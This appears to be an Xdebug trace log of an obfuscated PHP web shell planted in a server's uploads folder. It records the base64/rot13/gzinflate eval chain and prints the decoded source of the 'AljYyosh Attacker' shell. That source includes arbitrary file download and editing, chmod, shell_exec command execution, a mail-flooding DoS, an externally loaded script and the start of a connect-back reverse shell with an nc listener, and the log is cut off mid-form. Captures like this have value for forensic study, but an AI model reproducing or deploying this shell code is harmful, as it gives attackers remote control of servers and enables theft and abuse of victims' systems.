Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:48:18.070606]
1	0	1	0.000141	393528
1	3	0	0.000232	401632	{main}	1		/var/www/html/uploads/aljyysoh.php	0	0
1		A						/var/www/html/uploads/aljyysoh.php	2	$black = 'IGV2YWwgKGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygiMUdnZUk5Z1ZmYy9N\r\ncCtML0lPR2lQWjl0bG1MdU5MQnBGOE9aWnVmcnY4eXhwbVo1S2d5ZDJqYzZlRkVRQ0FtODk2\r\nM2R1OUdsTjBsRlk5cnB0QUdxSUkxcTdsYzNzaWVvRzMrbVlRcjZRczNWcHJVUjgxeFhwT0Y1\r\nN1BycGRMbUh3UzNjLzluOSt6d3pOK25hc0lldXdKUG1KTkhVVUdOWmRBNzlrQVNQN1RERytP\r\neVR2T0lQV2tONG5vTnNCMHpKdGYxS3JCUmIyd0RYWVJuSWI2NmpaUmd6Z1pRSkxRNG5ObHF5\r\ndVpqRFNTR2JUR1VjUFpHUlhab3VIRUZtcFdaaTJ0Vm1UTXRQK0xENVl4ZjJ3blpibVVQczJl\r\nVEtreVVkTUk0SGdmVVdaenA0UEtPOGE5QUJqVU1Pd2VScGtJZkp3ZUFX'
2	4	0	0.000285	401632	base64_decode	0		/var/www/html/uploads/aljyysoh.php	102	1	'IGV2YWwgKGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygiMUdnZUk5Z1ZmYy9N\r\ncCtML0lPR2lQWjl0bG1MdU5MQnBGOE9aWnVmcnY4eXhwbVo1S2d5ZDJqYzZlRkVRQ0FtODk2\r\nM2R1OUdsTjBsRlk5cnB0QUdxSUkxcTdsYzNzaWVvRzMrbVlRcjZRczNWcHJVUjgxeFhwT0Y1\r\nN1BycGRMbUh3UzNjLzluOSt6d3pOK25hc0lldXdKUG1KTkhVVUdOWmRBNzlrQVNQN1RERytP\r\neVR2T0lQV2tONG5vTnNCMHpKdGYxS3JCUmIyd0RYWVJuSWI2NmpaUmd6Z1pRSkxRNG5ObHF5\r\ndVpqRFNTR2JUR1VjUFpHUlhab3VIRUZtcFdaaTJ0Vm1UTXRQK0xENVl4ZjJ3blpibVVQczJl\r\nVEtreVVkTUk0SGdmVVdaenA0UEtPOGE5QUJqVU1Pd2VScGtJZkp3ZUFX'
2	4	1	0.000334	409856
2	4	R			' eval (gzinflate(base64_decode(str_rot13("1GgeI9gVfc/Mp+L/IOGiPZ9tlmLuNLBpF8OZZufrv8yxpmZ5Kgyd2jc6eFEQCAm8963du9GlN0lFY9rptAGqII1q7lc3sieoG3+mYQr6Qs3VprUR81xXpOF57PrpdLmHwS3c/9n9+zwzN+nasIeuwJPmJNHUUGNZdA79kASP7TDG+OyTvOIPWkN4noNsB0zJtf1KrBRb2wDXYRnIb66jZRgzgZQJLQ4nNlqyuZjDSSGbTGUcPZGRXZouHEFmpWZi2tVmTMtP+LD5Yxf2wnZbmUPs2eTKkyUdMI4HgfUWZzp4PKO8a9ABjUMOweRpkIfJweAWTjlbp6wH+4hWwnfPLOD7nMcAxvylYOMQ7VhK8Lri9Bgyu35i0X+QFEo4/SJ84I787FOtzDBGYVge7Q9G78LhgasP8qDMZjBTLfD2JSvocfLQpSrmJVsW2WsZbf33LGukxcEy9d0KVzsGJeB105'
2	5	0	0.000415	419192	eval	1	' eval (gzinflate(base64_decode(str_rot13("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")))); '	/var/www/html/uploads/aljyysoh.php	102	0
3	6	0	0.000523	419192	str_rot13	0		/var/www/html/uploads/aljyysoh.php(102) : eval()'d code	1	1	'1GgeI9gVfc/Mp+L/IOGiPZ9tlmLuNLBpF8OZZufrv8yxpmZ5Kgyd2jc6eFEQCAm8963du9GlN0lFY9rptAGqII1q7lc3sieoG3+mYQr6Qs3VprUR81xXpOF57PrpdLmHwS3c/9n9+zwzN+nasIeuwJPmJNHUUGNZdA79kASP7TDG+OyTvOIPWkN4noNsB0zJtf1KrBRb2wDXYRnIb66jZRgzgZQJLQ4nNlqyuZjDSSGbTGUcPZGRXZouHEFmpWZi2tVmTMtP+LD5Yxf2wnZbmUPs2eTKkyUdMI4HgfUWZzp4PKO8a9ABjUMOweRpkIfJweAWTjlbp6wH+4hWwnfPLOD7nMcAxvylYOMQ7VhK8Lri9Bgyu35i0X+QFEo4/SJ84I787FOtzDBGYVge7Q9G78LhgasP8qDMZjBTLfD2JSvocfLQpSrmJVsW2WsZbf33LGukxcEy9d0KVzsGJeB105YLZv/mJrsD//kuSdHGBPFTKoZRniOUxvVCbD3ArdB+'
3	6	1	0.000554	427416
3	6	R			'1TtrV9tIsp/Zc+Y/VBTvCM9gyzYhAYOcS8BMMhsei8lkczM5Xtlq2wp6rSRDPNz8963qh9TyA0ySL9ecgNTdVV1d7yp3fvrbT3+zLDe6Df3IceHE81kKcBS57CecqYzUjF3p/9a9+mjmA+anfVrhjWCzWAUHHTAMqN79xNFC7GQT+BlGiBVCJxA4abAfO0mWgs1XeOEo2jQKLEaVo66wMEtmtMDWYD4aAydlhMwQFFToGTHpCMTEKMbhURSzcJMv2gIzGZgC+YQ5Lks2jaMozHCf2rGXxlHqZV4UtsHJMmc4CXB8n9NOwHZBjrEcxVsWjrNJGwyoc6jU+4uJjasCYBQ7aZpNkilyLBZD7IuX8Yev9Otlh35v0K+DSRb4/FW84V787SBgmQOTLItr7D9T78YutnfC8dQZMwOGYsQ2WFibpsYDcFezWIfJ2JfMos33YThxkpRl9q0XImfTWrO105LYMi/zWefQ//xhFqUTOCSGXbMEavBHkiIPoQ3NeqO+'
3	7	0	0.000583	427384	base64_decode	0		/var/www/html/uploads/aljyysoh.php(102) : eval()'d code	1	1	'1TtrV9tIsp/Zc+Y/VBTvCM9gyzYhAYOcS8BMMhsei8lkczM5Xtlq2wp6rSRDPNz8963qh9TyA0ySL9ecgNTdVV1d7yp3fvrbT3+zLDe6Df3IceHE81kKcBS57CecqYzUjF3p/9a9+mjmA+anfVrhjWCzWAUHHTAMqN79xNFC7GQT+BlGiBVCJxA4abAfO0mWgs1XeOEo2jQKLEaVo66wMEtmtMDWYD4aAydlhMwQFFToGTHpCMTEKMbhURSzcJMv2gIzGZgC+YQ5Lks2jaMozHCf2rGXxlHqZV4UtsHJMmc4CXB8n9NOwHZBjrEcxVsWjrNJGwyoc6jU+4uJjasCYBQ7aZpNkilyLBZD7IuX8Yev9Otlh35v0K+DSRb4/FW84V787SBgmQOTLItr7D9T78YutnfC8dQZMwOGYsQ2WFibpsYDcFezWIfJ2JfMos33YThxkpRl9q0XImfTWrO105LYMi/zWefQ//xhFqUTOCSGXbMEavBHkiIPoQ3NeqO+'
3	7	1	0.000623	435608
3	7	R			'Õ;kWÛH²ŸÙsæ?T\024ï\bÏ`Ë6!\001ƒœKÀL2\033\036‹Éds39^ÙjÛ\nz­$C<Üü÷­ê‡Ôò\003L’/×œ€ÔÝU]]ï*w~úÛO³,7º\rýÈqáÄóY\np\024¹ì\'œ©ŒÔŒ]éÿÖ½úhæ\003æ§}Zá`³X\005\a\0350\f¨ÞýÄÑBìd\023ø\031Fˆ\025B\'\0208i°\037;I–‚ÍWxá(Ú4\n,F•£®°0Kf´ÀÖ`>\032\003\'e„Ì\020\024Tè\0311é\bÄÄ(ÆáQ\024³p“/Ú\0023\031˜\002ù„9.K6£(ÌpŸÚ±—ÆQêe^\024¶ÁÉ2g8\tp|ŸÓNÀvAŽ±\034Å[\026Ž³I\033\f¨s¨Ôû‹‰«\002`\024;išM’)r,\026Cì‹—ñ‡¯ôëe‡~oÐ¯ƒI\026øüU¼á^üí `™\003“,‹kì?SïÆ.¶wÂñÔ\0313\003†bÄ6XX›¦Æ\003pW³X‡ÉØ—Ì¢Í÷a8q’”eö­\027"gÓZ³µÓ’Ø2/óYçÐÿüa\026¥\0238$†]³\004jðG’"\017¡'
3	8	0	0.000734	427384	gzinflate	0		/var/www/html/uploads/aljyysoh.php(102) : eval()'d code	1	1	'Õ;kWÛH²ŸÙsæ?T\024ï\bÏ`Ë6!\001ƒœKÀL2\033\036‹Éds39^ÙjÛ\nz­$C<Üü÷­ê‡Ôò\003L’/×œ€ÔÝU]]ï*w~úÛO³,7º\rýÈqáÄóY\np\024¹ì\'œ©ŒÔŒ]éÿÖ½úhæ\003æ§}Zá`³X\005\a\0350\f¨ÞýÄÑBìd\023ø\031Fˆ\025B\'\0208i°\037;I–‚ÍWxá(Ú4\n,F•£®°0Kf´ÀÖ`>\032\003\'e„Ì\020\024Tè\0311é\bÄÄ(ÆáQ\024³p“/Ú\0023\031˜\002ù„9.K6£(ÌpŸÚ±—ÆQêe^\024¶ÁÉ2g8\tp|ŸÓNÀvAŽ±\034Å[\026Ž³I\033\f¨s¨Ôû‹‰«\002`\024;išM’)r,\026Cì‹—ñ‡¯ôëe‡~oÐ¯ƒI\026øüU¼á^üí `™\003“,‹kì?SïÆ.¶wÂñÔ\0313\003†bÄ6XX›¦Æ\003pW³X‡ÉØ—Ì¢Í÷a8q’”eö­\027"gÓZ³µÓ’Ø2/óYçÐÿüa\026¥\0238$†]³\004jðG’"\017¡'
3	8	1	0.000905	443800
3	8	R			'\r\n\r\n//download Files  Code\r\n\r\n$fdownload=$_GET[\'fdownload\'];\r\n\r\nif ($fdownload <> "" ){\r\n\r\n// path & file name\r\n\r\n$path_parts = pathinfo("$fdownload");\r\n\r\n$entrypath=$path_parts["basename"];\r\n\r\n$name = "$fdownload";\r\n\r\n$fp = fopen($name, \'rb\');\r\n\r\nheader("Content-Disposition: attachment; filename=$entrypath");\r\n\r\nheader("Content-Length: " . filesize($name));\r\n\r\nfpassthru($fp);\r\n\r\nexit;\r\n\r\n}\r\n\r\n?>\r\n\r\n\t\r\n\r\n<html>\r\n\r\n\r\n\r\n<head>\r\n\r\'
3	9	0	0.001026	455912	eval	1	'\r\n\r\n//download Files  Code\r\n\r\n$fdownload=$_GET[\'fdownload\'];\r\n\r\nif ($fdownload <> "" ){\r\n\r\n// path & file name\r\n\r\n$path_parts = pathinfo("$fdownload");\r\n\r\n$entrypath=$path_parts["basename"];\r\n\r\n$name = "$fdownload";\r\n\r\n$fp = fopen($name, \'rb\');\r\n\r\nheader("Content-Disposition: attachment; filename=$entrypath");\r\n\r\nheader("Content-Length: " . filesize($name));\r\n\r\nfpassthru($fp);\r\n\r\nexit;\r\n\r\n}\r\n\r\n?>\r\n\r\n\t\r\n\r\n<html>\r\n\r\n\r\n\r\n<head>\r\n\r\n<meta http-equiv="Content-Language" content="en-us">\r\n\r\n<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\r\n<title>AljYyosh Attacker - Vrsion : 1.0.5 - priv8  </title>\r\n<SCRIPT SRC=http://r57.gen.tr/yazciz/ciz.js></SCRIPT>\r\n<style>\r\n#darko{hight:250px;}\r\n<!--\r\n\r\nbody         { font-family: Tahoma; font-size: 8pt }\r\n\r\n-->\r\n\r\n</style>\r\n\r\n\r\n</head>\r\n\r\n<body>\r\n<div id="darko"><center>\r\n<a href="http://www.aljyyosh.com/vb"><img src="https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcQH3xMcMLohfiN1lo2lNR0p_jbO0YgOfwFUxJ2NQveU723iVHateg" alt="aljyyosh" title="aljyysoh"></a></center>\r\n\r\n\r\n\r\n\r\n</div>\r\n\r\n<?\r\n\r\nerror_reporting(E_ERROR | E_WARNING | E_PARSE);\r\n\r\n\r\n\r\n //File Edit\r\n\r\n $fedit=$_GET[\'fedit\'];\r\n\r\n if ($fedit <> "" ){\r\n\r\n $fedit=realpath($fedit);\r\n\r\n $lines = file($fedit);\r\n\r\n echo "<form action=\'\' method=\'POST\'>";\r\n\r\necho "<textarea name=\'savefile\' rows=30 cols=80>" ;\r\n\r\nforeach ($lines as $line_num => $line) {\r\n\r\n echo htmlspecialchars($line);\r\n\r\n}\r\n\r\necho "</textarea>\r\n\r\n\t<input type=\'text\' name=\'filepath\'  size=\'60\' value=\'$fedit\'>\r\n\r\n\t<input type=\'submit\' value=\'save\'></form>";\r\n\r\n\t$savefile=$_POST[\'savefile\'];\r\n\r\n\t$filepath=realpath($_POST[\'filepath\']);\r\n\r\n\tif ($savefile <> "") \r\n\r\n\t{\r\n\r\n\t$fp=fopen("$filepath","w+");\r\n\r\n\tfwrite ($fp,"") ;\r\n\r\n\tfwrite ($fp,$savefile) ;\r\n\r\n\tfclose($fp);\r\n\r\n\techo "<script language=\'javascript\'> close()</script>";\r\n\r\n\t}\r\n\r\nexit();\r\n\r\n }\r\n\r\n?>\r\n\r\n<?\r\n\r\n// CHmod - PRimission\r\n\r\n$fchmod=$_GET[\'fchmod\'];\r\n\r\nif ($fchmod <> "" ){\r\n\r\n$fchmod=realpath($fchmod);\r\n\r\necho "<center><br>\r\n\r\nchmod for :$fchmod<br>\r\n\r\n<form method=\'POST\' action=\'\'><br>\r\n\r\nChmod :<br>\r\n\r\n<input type=\'text\' name=\'chmod0\' ><br>\r\n\r\n<input type=\'submit\' value=\'change chmod\'>\r\n\r\n</form>";\r\n\r\n$chmod0=$_POST[\'chmod0\'];\r\n\r\nif ($chmod0 <> ""){\r\n\r\nchmod ($fchmod , $chmod0);\r\n\r\n}else {\r\n\r\necho "primission Not Allow change Chmod";\r\n\r\n}\r\n\r\nexit();\r\n\r\n}\r\n\r\n?>\r\n\r\n\t\r\n\r\n<div align="center">\r\n\r\n\t<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">\r\n\r\n\t\t<tr>\r\n\r\n\t\t\t<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">\r\n\r\n\t\t\t\t<p align="center"><b>\r\n\r\n\t\t\t\t<font face="Tahoma" size="2"><br>\r\n\r\n\t\t\t\t</font>\r\n\r\n\t\t\t\t<font color="#D2D200" face="Tahoma" size="2">\r\n\r\n\t\t\t\t<span style="text-decoration: none">\r\n\r\n\t\t\t\t<font color="#000000">\r\n\r\n\t\t\t\t<a href="?id=fm&dir=<?\r\n\r\n\techo getcwd();\r\n\r\n\t?>\r\n\r\n\t">\r\n\r\n\t\t\t\t<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>\r\n\r\n\t\t\t\t<p align="center"><b><a href="?id=cmd">\r\n\r\n\t\t\t\t<span style="text-decoration: none">\r\n\r\n\t\t\t\t<font face="Tahoma" size="2" color="#000000">\r\n\r\n\t\t\t\tCMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>\r\n\r\n\t\t\t\t<p align="center"><b><a href="?id=fake-mail">\r\n\r\n\t\t\t\t<font face="Tahoma" size="2" color="#000000">\r\n\r\n\t\t\t\t<span style="text-decoration: none">Fake mail</span></font></a></b></p>\r\n\r\n\t\t\t\t<p align="center"><b>\r\n\r\n\t\t\t\t<font face="Tahoma" size="2" color="#000000">\r\n\r\n\t\t\t\t<a href="?id=cshell">\r\n\r\n\t\t\t\t<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>\r\n\r\n\t\t\t\t<p align="center"><b>\r\n\r\n\t\t\t\t<font color="#000000" face="Tahoma" size="2">\r\n\r\n\t\t\t\t<a href="?id=">\r\n\r\n\t\t\t\t<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>\r\n\r\n\t\t\t\t<p>&nbsp;<p align="center">&nbsp;</td>\r\n\r\n\t\t\t<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">\r\n\r\n\t\t\t<?\r\n\r\n\t\t\t//*******************************************************\r\n\r\n\t\t\t//Start Programs About US\r\n\r\n\t\t\t$id=$_GET[\'id\'];\r\n\r\n\r\n\r\n\t\t\tif ($id=="") {\r\n\r\n\t\t\techo "\r\n\r\n\t\t\t<font face=\'Arial Black\' color=\'#808080\' size=\'1\'>\r\n\r\n***************************************************************************<br>\r\n\r\n&nbsp;AljYYosh Team : WWW.ALJYYOSH.COM/vb <br>\r\n\r\n&nbsp;Programmer : DaRk-PRiNcE110 <br>\r\n\r\n&nbsp;Note : AljYYosh Attacker&nbsp; Have copyright from ALjYYosh security Group  <br>\r\n\r\n&nbsp;please : If you find bug or problems in program , tell us : <br>\r\n\r\n&nbsp;e-mail : http://www.Aljyyosh.com/vb<br>\r\n\r\nEnjoy :) [Only 4 Best Friends ] <br>\r\n\r\n***************************************************************************</font></span></p>\r\n\r\n";\r\n\r\n\r\n\r\necho "<font color=\'#333333\' size=\'2\'>OS :". php_uname();\r\n\r\necho "<br>IP :". \r\n\r\n($_SERVER[\'REMOTE_ADDR\']);\r\n\r\necho "</font>";\r\n\r\n\r\n\r\n\r\n\r\n\t\t\t}\r\n\r\n\t\t\t//************************************************************\r\n\r\n\t\t\t//cmd-command line\r\n\r\n\t\t\t$cmd=$_POST[\'cmd\'];\r\n\r\n\t\t\tif($id=="cmd"){\r\n\r\n\t\t$result=shell_exec("$cmd");\r\n\r\n\t\techo "<br><center><h3> CMD ExeCute </h3></center>" ;\r\n\r\n\t\techo "<center>\r\n\r\n\t\t<textarea rows=20 cols=70 >$result</textarea><br>\r\n\r\n\t\t<form method=\'POST\' action=\'\'>\r\n\r\n\t\t<input type=\'hidden\' name=\'id\' value=\'cmd\'>\r\n\r\n\t\t<input type=\'text\' size=\'80\' name=\'cmd\' value=\'$cmd\'>\r\n\r\n\t\t<input type=\'submit\' value=\'cmd\'><br>";\r\n\r\n\t\t\t\r\n\r\n\t\t\t\r\n\r\n\t\t\t\r\n\r\n\t\t\t}\r\n\r\n\t\t\t\r\n\r\n\t\t//********************************************************\t\r\n\r\n\t\t\r\n\r\n\t\t//fake mail = Use victim server 4 DOS - fake mail \r\n\r\n\t\tif ( $id=="fake-mail"){\r\n\r\n\t\terror_reporting(0);\r\n\r\n\t\techo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;\r\n\r\n\t\techo "<center><form method=\'post\' action=\'\'>\r\n\r\n\t\tVictim Mail :<br><input type=\'text\' name=\'to\' ><br>\r\n\r\n\t\tNumber-Mail :<br><input type=\'text\' size=\'5\' name=\'nom\' value=\'100\'><br>\r\n\r\n\t\tComments:\r\n\r\n\t\t<br>\r\n\r\n\t\t<textarea rows=\'10\' cols=50 name=\'Comments\' ></textarea><br>\r\n\r\n\t\t<input type=\'submit\' value=\'Send Mail Strm \' >\r\n\r\n\t\t</form></center>";\r\n\r\n\t\t//send Storm Mail\r\n\r\n\t\t$to=$_POST[\'to\'];\r\n\r\n\t\t$nom=$_POST[\'nom\'];\r\n\r\n\t\t$Comments=$_POST[\'Comments\'];\r\n\r\n\t\tif ($to <> "" ){\r\n\r\n\t\tfor ($i = 0; $i < $nom ; $i++){\r\n\r\n\t\t$from = rand (71,1020000000)."@"."Attacker.com";\r\n\r\n\t\t$subject= md5("$from");\r\n\r\n        mail($to,$subject,$Comments,"From:$from");\r\n\r\n        echo "$i is ok";\r\n\r\n        }      \r\n\r\n        echo "<script language=\'javascript\'> alert(\'Sending Mail - please waite ... AljYYosh AttaCk\')</script>";\r\n\r\n        }\r\n\r\n\t\t}\r\n\r\n\t\t//********************************************************\r\n\r\n\r\n\r\n\t\t\t//Connect Back -Firewall Bypass\r\n\r\n\t\t\tif ($id=="cshell"){\r\n\r\n\t\t\techo "<br>Connect back Shell , bypass Firewalls<br>\r\n\r\n\t\t\tFor user :<br>\r\n\r\n\t\t\tnc -l -p 1019 <br>\r\n\r\n\t\t\t<hr>\r\n\r\n\t\t\t<form method=\'POST\' action=\'\'><br>\r\n\r\n\t\t\tYour IP & BindPort:<br>\r\n\r\n\t\t\t<input type=\'text\' name=\'mip\' >\r\n\r\n\t\t\t<input type=\'text\' name=\'bport\' size=\'5\' value=\'1019\'><br>\r\n\r\n\t\t\t<input type=\'submit\' value=\'Connect 